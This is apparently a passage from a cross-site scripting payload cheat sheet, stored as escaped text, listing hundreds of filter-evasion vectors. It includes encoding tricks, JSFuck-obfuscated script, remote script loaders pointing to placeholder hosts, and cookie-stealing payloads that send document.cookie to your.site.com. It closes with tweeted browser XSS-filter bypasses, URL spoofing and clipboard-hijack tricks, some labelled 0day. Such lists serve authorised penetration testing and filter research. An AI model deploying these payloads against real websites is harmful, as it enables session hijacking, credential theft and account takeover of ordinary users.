SRC=\"http://xxxx.com/xsstest.xml\" ID=I\u003e\u003c/XML\u003e\n\u003cHTML\u003e\u003cBODY\u003e\n\u003cSCRIPT id=XSS SRC=\"http://xxxx.com/xss.jpg\"\u003e\u003c/SCRIPT\u003e\n\u003c!--#exec cmd=\"/bin/echo '\u003cSCRIPT SRC'\"--\u003e\u003c!--#exec cmd=\"/bin/echo '=http://xxxx.com/xss.js\u003e\u003c/SCRIPT\u003e'\"--\u003e\n\u003c? echo('\u003cSCR)';\n\u003cMETA HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=\u003cSCRIPT\u003ealert('XSS')\u003c/SCRIPT\u003e\"\u003e\n\u003cHEAD\u003e\u003cMETA HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"\u003e \u003c/HEAD\u003e+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-\n\u003cSCRIPT a=\"\u003e\" id=XSS SRC=\"http://xxxx.com/xss.js\"\u003e\u003c/SCRIPT\u003e\n\u003cSCRIPT a=\"\u003e\" '' id=XSS SRC=\"http://xxxx.com/xss.js\"\u003e\u003c/SCRIPT\u003e\n\u003cSCRIPT \"a='\u003e'\" id=XSS SRC=\"http://xxxx.com/xss.js\"\u003e\u003c/SCRIPT\u003e\n\u003cSCRIPT a=`\u003e` id=XSS SRC=\"http://xxxx.com/xss.js\"\u003e\u003c/SCRIPT\u003e\n\u003cSCRIPT\u003edocument.write(\"\u003cSCRI\");\u003c/SCRIPT\u003ePT id=XSS SRC=\"http://xxxx.com/xss.js\"\u003e\u003c/SCRIPT\u003e\n\u003csCrIpt\u003ealert(1)\u003c/ScRipt\u003e\n\u003ciMg srC=1 lAnGuAGE=VbS oNeRroR=mSgbOx(1)\u003e\nNull-byte character between HTML attribute name and equal sign (IE, Safari).\n\u003cimg src='1' onerror\\x00=alert(0) /\u003e\nSlash character between HTML attribute name and equal sign (IE, Firefox, Chrome, Safari).\n\u003cimg src='1' onerror/=alert(0) /\u003e\nVertical tab between HTML attribute name and equal sign (IE, Safari).\n\u003cimg src='1' onerror\\x0b=alert(0) /\u003e\nNull-byte character between equal sign and JavaScript code (IE).\n\u003cimg src='1' onerror=\\x00alert(0) /\u003e\nNull-byte character between characters of HTML attribute names (IE).\n\u003cimg src='1' o\\x00nerr\\x00or=alert(0) /\u003e\nNull-byte character before characters of HTML element names (IE).\n\u003c\\x00img src='1' onerror=alert(0) /\u003e\nNull-byte character after characters of HTML element names (IE, Safari).\n\u003cscript\\x00\u003ealert(1)\u003c/script\u003e\nNull-byte character between characters of HTML element names (IE).\n\u003ci\\x00mg src='1' onerror=alert(0) /\u003e\nUse slashes instead of whitespace (IE, Firefox, Chrome, Safari).\n\u003cimg/src='1'/onerror=alert(0)\u003e\nUse vertical tabs instead of whitespace (IE, Safari).\n\u003cimg\\x0bsrc='1'\\x0bonerror=alert(0)\u003e\nUse quotes instead of whitespace in some situations (Safari).\n\u003cimg src='1''onerror='alert(0)'\u003e\n\u003cimg src='1'\"onerror=\"alert(0)\"\u003e\nUse null-bytes instead of whitespaces in some situations (IE).\n\u003cimg src='1'\\x00onerror=alert(0)\u003e\nJust don't use spaces (IE, Firefox, Chrome, Safari).\n\u003cimg src='1'onerror=alert(0)\u003e\nPrefix URI schemes.\nFirefox (\\x09, \\x0a, \\x0d, \\x20)\nChrome (Any character \\x01 to \\x20)\n\u003ciframe src=\"\\x01javascript:alert(0)\"\u003e\u003c/iframe\u003e \u003c!-- Example for Chrome --\u003e\nNo greater-than characters needed (IE, Firefox, Chrome, Safari).\n\u003cimg src='1' onerror='alert(0)' \u003c\nExtra less-than characters (IE, Firefox, Chrome, Safari).\n\u003c\u003cscript\u003ealert(0)\u003c/script\u003e\nBackslash character between expression and opening parenthesis (IE).\n\u003cstyle\u003ebody{background-color:expression\\(alert(1))}\u003c/style\u003e\nJavaScript Escaping\n\u003cscript\u003edocument.write('\u003ca hr\\ef=j\\avas\\cript\\:a\\lert(2)\u003eblah\u003c/a\u003e');\u003c/script\u003e\nEncoding Galore.\nHTML Attribute Encoding\n\u003cimg src=\"1\" onerror=\"alert(1)\" /\u003e\n\u003cimg src=\"1\" onerror=\"alert(1)\" /\u003e\n\u003ciframe src=\"javascript:alert(1)\"\u003e\u003c/iframe\u003e\n\u003ciframe src=\"javascript:alert(1)\"\u003e\u003c/iframe\u003e\nURL Encoding\n\u003ciframe src=\"javascript:alert(1)\"\u003e\u003c/iframe\u003e\n\u003ciframe src=\"javascript:%61%6c%65%72%74%28%31%29\"\u003e\u003c/iframe\u003e\nCSS Hexadecimal Encoding (IE specific examples)\n\u003cdiv style=\"x:expression(alert(1))\"\u003eJoker\u003c/div\u003e\n\u003cdiv style=\"x:\\65\\78\\70\\72\\65\\73\\73\\69\\6f\\6e(alert(1))\"\u003eJoker\u003c/div\u003e\n\u003cdiv style=\"x:\\000065\\000078\\000070\\000072\\000065\\000073\\000073\\000069\\00006f\\00006e(alert(1))\"\u003eJoker\u003c/div\u003e\n\u003cdiv style=\"x:\\65\\78\\70\\72\\65\\73\\73\\69\\6f\\6e\\028 alert \\028 1 \\029 \\029\"\u003eJoker\u003c/div\u003e\nJavaScript (hexadecimal, octal, and unicode)\n\u003cscript\u003edocument.write('\u003cimg src=1 onerror=alert(1)\u003e');\u003c/script\u003e\n\u003cscript\u003edocument.write('\\x3C\\x69\\x6D\\x67\\x20\\x73\\x72\\x63\\x3D\\x31\\x20\\x6F\\x6E\\x65\\x72\\x72\\x6F\\x72\\x3D\\x61\\x6C\\x65\\x72\\x74\\x28\\x31\\x29\\x3E');\u003c/script\u003e\n\u003cscript\u003edocument.write('\\074\\151\\155\\147\\040\\163\\162\\143\\075\\061\\040\\157\\156\\145\\162\\162\\157\\162\\075\\141\\154\\145\\162\\164\\050\\061\\051\\076');\u003c/script\u003e\n\u003cscript\u003edocument.write('\\u003C\\u0069\\u006D\\u0067\\u0020\\u0073\\u0072\\u0063\\u003D\\u0031\\u0020\\u006F\\u006E\\u0065\\u0072\\u0072\\u006F\\u0072\\u003D\\u0061\\u006C\\u0065\\u0072\\u0074\\u0028\\u0031\\u0029\\u003E');\u003c/script\u003e\nJavaScript (Decimal char codes)\n\u003cscript\u003edocument.write('\u003cimg src=1 onerror=alert(1)\u003e');\u003c/script\u003e\n\u003cscript\u003edocument.write(String.fromCharCode(60,105,109,103,32,115,114,99,61,49,32,111,110,101,114,114,111,114,61,97,108,101,114,116,40,48,41,62));\u003c/script\u003e\nJavaScript (Unicode function and variable names)\n\u003cscript\u003ealert(123)\u003c/script\u003e\n\u003cscript\u003e\\u0061\\u006C\\u0065\\u0072\\u0074(123)\u003c/script\u003e\nOverlong UTF-8 (SiteMinder is awesome!)\n\u003c = %C0%BC = %E0%80%BC = %F0%80%80%BC\n\u003e = %C0%BE = %E0%80%BE = %F0%80%80%BE\n' = %C0%A7 = %E0%80%A7 = %F0%80%80%A7\n\" = %C0%A2 = %E0%80%A2 = %F0%80%80%A2\n\u003cimg src=\"1\" onnerror=\"alert(1)\"\u003e\n%E0%80%BCimg%20src%3D%E0%80%A21%E0%80%A2%20onerror%3D%E0%80%A2alert(1)%E0%80%A2%E0%80%BE\nUTF-7 (Missing charset?)\n\u003cimg src=\"1\" onerror=\"alert(1)\" /\u003e\n+ADw-img src=+ACI-1+ACI- onerror=+ACI-alert(1)+ACI- /+AD4-\nUnicode .NET Ugliness\n\u003cscript\u003ealert(1)\u003c/script\u003e\n%uff1cscript%uff1ealert(1)%uff1c/script%uff1e\nClassic ASP performs some unicode homoglyphic translations... don't ask why...\n\u003cimg src=\"1\" onerror=\"alert('1')\"\u003e\n%u3008img%20src%3D%221%22%20onerror%3D%22alert(%uFF071%uFF07)%22%u232A\nUseless and/or Useful features.\nHTML 5 (Not comphrensive)\n\u003cvideo src=\"http://www.w3schools.com/html5/movie.ogg\" onloadedmetadata=\"alert(1)\" /\u003e\n\u003cvideo src=\"http://www.w3schools.com/html5/movie.ogg\" onloadstart=\"alert(1)\" /\u003e\nUsuage of non-existent elements (IE)\n\u003cblah style=\"blah:expression(alert(1))\" /\u003e\nCSS Comments (IE)\n\u003cdiv style=\"z:exp/*anything*/res/*here*/sion(alert(1))\" /\u003e\nAlternate ways of executing JavaScript functions\n\u003cscript\u003ewindow['alert'](0)\u003c/script\u003e\n\u003cscript\u003eparent['alert'](1)\u003c/script\u003e\n\u003cscript\u003eself['alert'](2)\u003c/script\u003e\n\u003cscript\u003etop['alert'](3)\u003c/script\u003e\nSplit up JavaScript into HTML attributes\n\u003cimg src=1 alt=al lang=ert onerror=top[alt+lang](0)\u003e\nHTML is parsed before JavaScript\n\u003cscript\u003e\nvar junk = '\u003c/script\u003e\u003cscript\u003ealert(1)\u003c/script\u003e';\n\u003c/script\u003e\nHTML is parsed before CSS\n\u003cstyle\u003e\nbody { background-image:url('http://www.blah.com/\u003c/style\u003e\u003cscript\u003ealert(1)\u003c/script\u003e'); }\n\u003c/style\u003e\nXSS in XML documents [doctype = text/xml] (Firefox, Chrome, Safari).\n\u003c?xml version=\"1.0\" ?\u003e\n\u003csomeElement\u003e\n\u003ca xmlns:a='http://www.w3.org/1999/xhtml'\u003e\u003ca:body onload='alert(1)'/\u003e\u003c/a\u003e\n\u003c/someElement\u003e\nURI Schemes\n\u003ciframe src=\"javascript:alert(1)\"\u003e\u003c/iframe\u003e\n\u003ciframe src=\"vbscript:msgbox(1)\"\u003e\u003c/iframe\u003e (IE)\n\u003ciframe src=\"data:text/html,\u003cscript\u003ealert(0)\u003c/script\u003e\"\u003e\u003c/iframe\u003e (Firefox, Chrome, Safari)\n\u003ciframe src=\"data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\"\u003e\u003c/iframe\u003e (Firefox, Chrome, Safari)\nHTTP Parameter Pollution\nhttp://target.com/something.xxx?a=val1\u0026a=val2\nASP.NET     a = val1,val2\nASP         a = val1,val2\nJSP         a = val1\nPHP         a = val2\nTwo Stage XSS via fragment identifier (bypass length restrictions / avoid server logging)\n\u003cscript\u003eeval(location.hash.slice(1))\u003c/script\u003e\n\u003cscript\u003eeval(location.hash)\u003c/script\u003e (Firefox)\nhttp://target.com/something.jsp?inject=\u003cscript\u003eeval(location.hash.slice(1))\u003c/script\u003e#alert(1)\nTwo Stage XSS via name attribute\n\u003ciframe src=\"http://target.com/something.jsp?inject=\u003cscript\u003eeval(name)\u003c/script\u003e\" name=\"alert(1)\"\u003e\u003c/iframe\u003e\nNon-alphanumeric crazyness...\n\u003cscript\u003e\n$=~[];$={___:++$,$$$$:(![]+\"\")[$],__$:++$,$_$_:(![]+\"\")[$],_$_:++$,$_$$:({}+\"\")[$],$$_$:($[$]+\"\")[$],_$$:++$,$$$_:(!\"\"+\"\")[$],$__:++$,$_$:++$,$$__:({}+\"\")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+\"\")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+\"\")[$.__$])+((!$)+\"\")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!\"\"+\"\")[$.__$])+($._=(!\"\"+\"\")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!\"\"+\"\")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+\"\\\"\"+$.$_$_+(![]+\"\")[$._$_]+$.$$$_+\"\\\\\"+$.__$+$.$$_+$._$_+$.__+\"(\"+$.___+\")\"+\"\\\"\")())();\n\u003c/script\u003e\n\u003cscript\u003e\n(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()\n\u003c/script\u003e\n\u003cimg src=x onerror=with(document)body.appendChild(document.createElement('script')).src=\"domain.js\"\u003e\u003c/img\u003e\n\u003cimg src=x onerror=\"with(document)body.appendChild(createElement('script')).src='domain.js'\"\u003e\u003c/img\u003e\n\u003cimg src=1 onerror=jQuery.getScript(\"domain.js\")\u003e \n\u003cimg src=\"#\" onerror=\"$.getScript('domain.js')\"\u003e\n\u003cimg src=\"#\" onerror=\"var a=String.fromCharCode(47);$.getScript(a+a+'domain.sj'+a+'4091')\"\u003e\n\u003cimg src='0' onerror=with(document)body.appendChild(createElement('script')).src='domain.js'\u003e\n\u003cimg src=\"#\" onload=\"s=document.createElement('script');s.src='domain.js'+Math.random();document.body.appendChild(s)\" border=\"0\"\u003e\n\u003cimg src=i onerror=eval(jQuery.getScript('domain.js'))\u003e\n\u003cimg src=N onerror=eval(javascript:document.write(unescape(' \u003cscript src=\"domain.js\"\u003e\u003c/script\u003e'));)\u003e\n\u003cimg src=x onerror=document.body.appendChild(document.createElement('script')).src='domain.js'\u003e\n\u003cimg src=x onerror=\"with(document)body.appendChild(createElement('script')).src='domain.js'\" width=\"0\" height=\"0\"\u003e\u003c/img\u003e\n\u003c  script \u003e \u003c / script\u003e\n\u0026lt\n\u0026lt;\n\u0026LT\n\u0026LT;\n\u003c\n\u003c\u003c\n\u003c\u003c\u003c\n\"\u003e\u003cscript\u003e\"\n\u003cscript\u003ealert(\"XSS\")\u003c/script\u003e\n\u003c\u003cscript\u003ealert(\"XSS\");//\u003c\u003c/script\u003e\n\u003cscript\u003ealert(document.cookie)\u003c/script\u003e\n'\u003e\u003cscript\u003ealert(document.cookie)\u003c/script\u003e\n'\u003e\u003cscript\u003ealert(document.cookie);\u003c/script\u003e\n\";alert('XSS');//\n%3cscript%3ealert(\"XSS\");%3c/script%3e\n%3cscript%3ealert(document.cookie);%3c%2fscript%3e\n%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E\n\u0026ltscript\u0026gtalert(document.cookie);\u003c/script\u003e\n\u0026ltscript\u0026gtalert(document.cookie);\u0026ltscript\u0026gtalert\n\u003cxss\u003e\u003cscript\u003ealert('XSS')\u003c/script\u003e\u003c/vulnerable\u003e\n\u003cIMG%20SRC='javascript:alert(document.cookie)'\u003e\n\u003cIMG SRC=\"javascript:alert('XSS');\"\u003e\n\u003cIMG SRC=\"javascript:alert('XSS')\"\n\u003cIMG SRC=javascript:alert('XSS')\u003e\n\u003cIMG SRC=JaVaScRiPt:alert('XSS')\u003e\n\u003cIMG SRC=javascript:alert(\u0026quot;XSS\u0026quot;)\u003e\n\u003cIMG SRC=`javascript:alert(\"'XSS'\")`\u003e\n\u003cIMG \"\"\"\u003e\u003cSCRIPT\u003ealert(\"XSS\")\u003c/SCRIPT\u003e\"\u003e\n\u003cIMG SRC=javascript:alert(String.fromCharCode(88,83,83))\u003e\n\u003cIMG%20SRC='javasc\tript:alert(document.cookie)'\u003e\n\u003cIMG SRC=\"jav\tascript:alert('XSS');\"\u003e\n\u003cIMG SRC=\"jav\u0026#x09;ascript:alert('XSS');\"\u003e\n\u003cIMG SRC=\"jav\u0026#x0A;ascript:alert('XSS');\"\u003e\n\u003cIMG SRC=\"jav\u0026#x0D;ascript:alert('XSS');\"\u003e\n\u003cIMG SRC=\" \u0026#14;  javascript:alert('XSS');\"\u003e\n\u003cIMG DYNSRC=\"javascript:alert('XSS')\"\u003e\n\u003cIMG LOWSRC=\"javascript:alert('XSS')\"\u003e\n\u003cIMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'\u003e\n\u003cIMG SRC=\u0026#106;\u0026#97;\u0026#118;\u0026#97;\u0026#115;\u0026#99;\u0026#114;\u0026#105;\u0026#112;\u0026#116;\u0026#58;\u0026#97;\u0026#108;\u0026#101;\u0026#114;\u0026#116;\u0026#40;\u0026#39;\u0026#88;\u0026#83;\u0026#83;\u0026#39;\u0026#41;\u003e\n\u003cIMG SRC=\u0026#0000106\u0026#0000097\u0026#0000118\u0026#0000097\u0026#0000115\u0026#0000099\u0026#0000114\u0026#0000105\u0026#0000112\u0026#0000116\u0026#0000058\u0026#0000097\u0026#0000108\u0026#0000101\u0026#0000114\u0026#0000116\u0026#0000040\u0026#0000039\u0026#0000088\u0026#0000083\u0026#0000083\u0026#0000039\u0026#0000041\u003e\n\u003cIMG SRC=\u0026#x6A\u0026#x61\u0026#x76\u0026#x61\u0026#x73\u0026#x63\u0026#x72\u0026#x69\u0026#x70\u0026#x74\u0026#x3A\u0026#x61\u0026#x6C\u0026#x65\u0026#x72\u0026#x74\u0026#x28\u0026#x27\u0026#x58\u0026#x53\u0026#x53\u0026#x27\u0026#x29\u003e\n'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E\n\"\u003e\u003cscript\u003edocument.location='http://your.site.com/cgi-bin/cookie.cgi?'???.cookie\u003c/script\u003e\n%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E\n';alert(String.fromCharCode(88,83,83))//\\';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\u003e\u003c/SCRIPT\u003e!--\u003cSCRIPT\u003ealert(String.fromCharCode(88,83,83))\u003c/SCRIPT\u003e=\u0026{}\n'';!--\"\u003cXSS\u003e=\u0026{()}\n\u003cname\u003e','')); phpinfo(); exit;/*\u003c/name\u003e\n\u003c![CDATA[\u003cscript\u003evar n=0;while(true){n;}\u003c/script\u003e]]\u003e\n\u003c![CDATA[\u003c]]\u003eSCRIPT\u003c![CDATA[\u003e]]\u003ealert('XSS');\u003c![CDATA[\u003c]]\u003e/SCRIPT\u003c![CDATA[\u003e]]\u003e\n\u003c?xml version=\"1.0\" encoding=\"ISO-8859-1\"?\u003e\u003cfoo\u003e\u003c![CDATA[\u003c]]\u003eSCRIPT\u003c![CDATA[\u003e]]\u003ealert('XSS');\u003c![CDATA[\u003c]]\u003e/SCRIPT\u003c![CDATA[\u003e]]\u003e\u003c/foo\u003e\n\u003cxml ID=I\u003e\u003cX\u003e\u003cC\u003e\u003c![CDATA[\u003cIMG SRC=\"javas]]\u003e\u003c![CDATA[cript:alert('XSS');\"\u003e]]\u003e\n\u003cxml ID=\"xss\"\u003e\u003cI\u003e\u003cB\u003e\u0026lt;IMG SRC=\"javas\u003c!-- --\u003ecript:alert('XSS')\"\u0026gt;\u003c/B\u003e\u003c/I\u003e\u003c/xml\u003e\u003cSPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"\u003e\u003c/SPAN\u003e\u003c/C\u003e\u003c/X\u003e\u003c/xml\u003e\u003cSPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML\u003e\u003c/SPAN\u003e\n\n▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉\nTWITTER @xssvector Tweets:\n\n\u003cimg language=vbs src=\u003cb onerror=alert#1/1#\u003e\nOpera cross-domain set cookie 0day: document.cookie='xss=jackmasa;domain=.me.'\nReverse 401 basic auth phishing by @jackmasa POC:  \ndocument.domain='com' chrome/safari same domain suffix cross-domain trick.   \nSafari empty location bar bug by @jackmasa POC:   \nSafari location object pollution tech:  by @kinugawamasato  \nSafari URL spoofing about://mmme.me POC: \nOpera URL spoofing vuln data://mmme.me by @jackmasa POC:  \nUniversal URL spoofing data:;//mmme.me/view/1#1,2 #firefox #safari #opera  \nNew dom xss vector xxx.innerHTML=document.title  by @0x6D6172696F \nOpera data:message/rfc822 #XSS  by @insertScript \n#IE \u003ciframe\u003e\u003ciframe src=javascript:alert(/@jackmasa/)\u003e\u003c/iframe\u003e  \nIE cool expression xss \u003cdiv id=\"alert(/@0x6D6172696F/)\" style=\"x:expression(eval)(id)\"\u003e  \nClever webkit xss auditor bypass trick \u003cscript?=data:,alert(1)\u003c!--  by @cgvwzq \nBypass IE8 version flash docuemnt object protection  by @jackmasa \nBypass IE all version flash docuemnt object protection  by @gainover1 \nBypass IE9 flash docuemnt object protection  by @irsdl \nBypass IE8 flash docuemnt object protection  by @irsdl \nNew XSS vector (#Opera Specific) \u003csVg\u003e\u003cscRipt %00\u003eprompt\u0026lpar;/@soaj1664ashar/\u0026rpar;​​​​​​​​​​​​​​​​  \nIE xss filter bypass 0day : \u003cxml:namespace prefix=t\u003e\u003cimport namespace=t implementation=..... by @gainover1 #IE #0day  \n\u003ciframe srcdoc='\u0026lt;svg/onload=alert(/@80vul/)\u0026gt;'\u003e #chrome  \nIE xss filter bypass 0day :\u003cscript/%00%00v%00%00\u003ealert(/@jackmasa/)\u003c/script\u003e and %c0″//(%000000%0dalert(1)// #IE #0day  \nnew XMLHttpRequest().open(\"GET\", \"data:text/html,\u003csvg onload=alert(/@irsdl/)\u003e\u003c/svg\u003e\", false); #firefox #datauri  \n\u003ch1 onerror=alert(/@0x6D6172696F/)\u003eXSS\u003c/h1\u003e\u003cstyle\u003e*:after{content:url()}\u003c/style\u003e #firefox  \n\u003cscript for=_ event=onerror()\u003ealert(/@ma1/)\u003c/script\u003e\u003cimg id=_ src=\u003e #IE  \n\"\u003ca href=javascript\u0026.x3A;alert\u0026(x28;1\u0026)x29;//=\u003eclickme #IE #xssfilter  @kinugawamasato \nComponents.lookupMethod(self, 'alert')(1) #firefox  \nexternal.NavigateAndFind(' ',[],[]) #IE #URLredirect  \n\u003c?php header('content-type:text/html;charset=utf-7-utf-8-shift_jis');?\u003e IE decides charset as #utf-7 @hasegawayosuke \n\u003cmeta http-equiv=refresh content=\"0 javascript:alert(1)\"\u003e #opera  \n\u003cmeta http-equiv=refresh content=\"?,javascript\u0026colon;alert(1)\"\u003e #chrome  \n\u003csvg contentScriptType=text/vbs\u003e\u003cscript\u003eMsgBox\"@insertScript\"\u003ci\u003e #IE9 #svg #vbscript  \nsetTimeout(['alert(/@garethheyes/)']); #chrome #safari #firefox  \n\u003csvg\u003e\u003c/ y=\"\u003e\u003cx\" onload=alert('@0x6D6172696F')\u003e  #svg \nEvent.prototype[0]='@garethheyes',Event.prototype.length=1;Event.prototype.toString=[].join;onload=alert #webkit #opera  \nURL-redirect vuln == XSS ! Location:data:text/html,\u003csvg/onload=alert(document.domain)\u003e #Opera @jackmasa \n\u003ca href=\"data:application/x-x509-user-cert;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\"\u003eclick\u003c/a\u003e​  #Chrome #XSS @RSnake \nClipboard-hijack without script and css: http://\u003cbdo dir=rtl\u003eelgoog\u003c/bdo\u003e.com  \nOpera:\u003cstyle\u003e*{-o-link:'data:text/html,\u003csvg/onload=alert(/@garethheyes/)\u003e';-o-link-source:current}\u003c/style\u003e\u003ca href=1\u003eaaa  \n$=\u003c\u003e@mozilla.org/js/function\u003c/\u003e;$::[\u003c\u003ealert\u003c/\u003e](/@superevr/) #firefox  \nFirefox cookie xss: with(document)cookie='∼≩≭≧∯≳≲≣∽≸≸∺≸∠≯≮≥≲≲≯≲∽≡≬≥≲≴∨∱∩∾',write(cookie);  by @jackmasa \n\u003csvg\u003e\u003cscript\u003elocation\u0026equals;\u0026#60\u0026#62javascript\u0026amp;#x3A;alert(1)\u0026#60\u0026#33\u0026#47\u0026#62;\u003c/script\u003e #Firefox #JustForFun  \nJust don't support IE \u003ca href=[0x0b]\" onclick=alert(1)//\"\u003eclick\u003c/a\u003e  \n\u003cstyle\u003e//\u003c!--\u003c/style\u003e --\u003e*{x:expression(alert(/@jackmasa/))}//\u003cstyle\u003e\u003c/style\u003e  \n\u003c!-- --!\u003e\u003cinput value=\"--\u003e\u003cbody/onload=`alert(/ @jackmasa /)//`\"\u003e  #IE #XSS \nInput[hidden] XSS \u003cinput type=hidden style=`x:expression(alert(/ @garethheyes /))`\u003e target it.  \nFirefox clipboard-hijack without script and css : http://\u003cimg alt=\"evil/#\" width=0 height=0 \u003e  \n\u003c![\u003cimg src=x:x onerror=`alert(/ @jackmasa /)//`]--\u003e  \n#E4X \u003c{alert(1)}\u003e\u003c/{alert(2)}\u003e.(alert(3)).@wtf.(wtf) by @garethheyes \n#vbscript coool feature chr(\u0026H4141)=\"A\", Chr(7^5)=A and Chr(\u0026O41) =‘A’ by @masa141421356 \n({})[$='\\143\\157\\156\\163\\164\\162\\165\\143\\164\\157\\162'][$]('\\141\\154\\145\\162\\164\\50/ @0x6D6172696F /\\51')()  \nNo referer : \u003ciframe src=\"javascript:'\u003cscript src=\u003e;\u003c/script\u003e'\"\u003e\u003c/iframe\u003e  